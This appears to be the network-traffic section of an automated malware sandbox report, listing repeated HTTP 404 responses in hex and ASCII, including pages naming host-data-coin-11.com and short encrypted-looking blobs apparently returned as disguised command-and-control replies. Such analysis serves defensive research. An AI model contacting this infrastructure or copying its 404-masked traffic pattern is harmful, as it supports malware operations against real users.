                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 11 Jan 2022 22:36:58 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 e5 a0 8f 70 bc 57 dd 43 d1 fd 20 82 22 ed c3 90 55 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC "U*c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
